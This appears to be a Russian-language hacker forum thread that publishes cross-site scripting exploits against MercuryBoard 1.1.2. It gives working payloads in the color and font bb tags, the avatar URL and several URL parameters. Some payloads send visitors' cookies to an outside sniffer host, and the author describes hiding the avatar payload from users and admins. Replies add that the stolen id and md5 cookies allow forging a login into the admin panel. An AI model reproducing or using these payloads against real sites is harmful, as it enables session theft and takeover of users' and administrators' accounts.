Несколько уязвимостей xss в форуме MercuryBoard (2 ПРИМИТИВНЕЙШИХ в bb тегах и 1 в аватарке) 1 из них заключается в плохой защищенности bb тега color, что дает нам право внедрить в него xss иньекцию. Итак, вот сплойт: Для алерта: Code: [color=black;background:url(javascript:alert(document.cookie))]123[/color] И для сниффа: Code: [color=black;background:url(javascript:img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);]123[/color] 2 уязвимость заключается в плохой защищенности bb тега font, что также дает возможность внедрить в его тело вредоносный код. Для алерта: Code: [font=courier;background:url(javascript:alert(document.cookie))]123[/font] И для сниффа: Code: [font=courier;background:url(javascript:img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)]123[/font] 3 дыра самая интересная и самая матерая, это уязвимость в аватарке. Мы можем внедрить в адресс аватара свой сплойт, при этом со стороны это не будет никак выкупатся=), а сплойт тем временем будет собирать кукисы всех, кто будет читать ваши посты, или кто заглянет к вам в личный кабинет. При этом, при просмотре свойств аватара, пользователь не увидит ничего подозрительного, так как, в адресе будет указано http://smailiki.ru/smile/1.gif/ . Как видим, слеш в конце нам все поганит, это проявляется из-за экранирования знака (') ,бек слешем. Но с этим ничего не поделаешь, и хоть аватарка отображатся не будет, у обычных пользователей, да даже у админов, имхо это вызовет мало подозрений. Пускай думают что глюки.=) Чуть не забыл, вот и сплойт: Code: http://smailiki.ru/smile/1.gif'style=background:url(javascript:img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;);1.gif ну и как уже стало традицией, алерт: Code: http://smailiki.ru/smile/1.gif'style=background:url(javascript:alert(document.cookie));1.gif
Уже когда все набрал, подумал, а зачем аватврка нам вообще нужна, сделаем её невидимой, как будто бы её вообще нету. И ход этот правильный, так как палива в данной ситуации ноль. Итак, вот сплойт: Code: 'style=background:url(javascript:img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);display:none;1.gif
Укажи плиз версию MercuryBoard... И кроме того, если публикуете такие баги, то не мешало бы описать систему защиты форума в целом. Хранится ли пасс в куках, не используется ли двойное хеширование и т.п. Потому как эти XSS могут ничего и не давать.
Я проганял это всё на форуме версии 1.1.2 В куках хранятся только id пользователя и его md5 хеш, следует на сниффер мы получаем эти данные. Вот алерт как пример:
Ну вот скрин к примеру: http://rts.h15.ru/mer1.png и http://rts.h15.ru/mer2.png ХЗ, когда нашел прежде всего проверил на секлабе, таких нет, а были бы найдены, полюбому были бы там, имхо.
Если не ошибаешься подскажи тогда для vBullentin'a и phpBB , вроде где-то читал что малую фильтрацию проходят и что можно "захватить" cp юзверя в phpbb или я уже запамятовал...
Вот ещё одна xss`ска(в профиле): Code: [url="http://www.site.ru/mercutyboard/index.php?a=profile&w=<script>alert(document.cookie)</script>"]http://www.site.ru/mercutyboard/index.php?a=profile&w=<script>alert(document.cookie)</script> [/url] Интуиция подсказывает что это ещё не всё....
Нет, никакого двойного хеш. не используется. Все очень просто... md5 хеш и номер юзера в таблице Можно подделать куки и зайти в админку
Вот ещё парочка: Code: http://site/mercuryboard/index.php?a=topic&t=[color=lime]"[/color][color=lime]><script>alert(document.cookie)</script>[/color] Code: http://site/mercuryboard/index.php?a=cp&s=addsub&type=[color=lime]"><script>alert(document.cookie)</script>[/color]topic&item=3 Оставляю только те, которых нет на секлабе.
Если честно, то просто позорно в таких форумах находить баги. Равно сильно у ребёнка отнять конфетку.
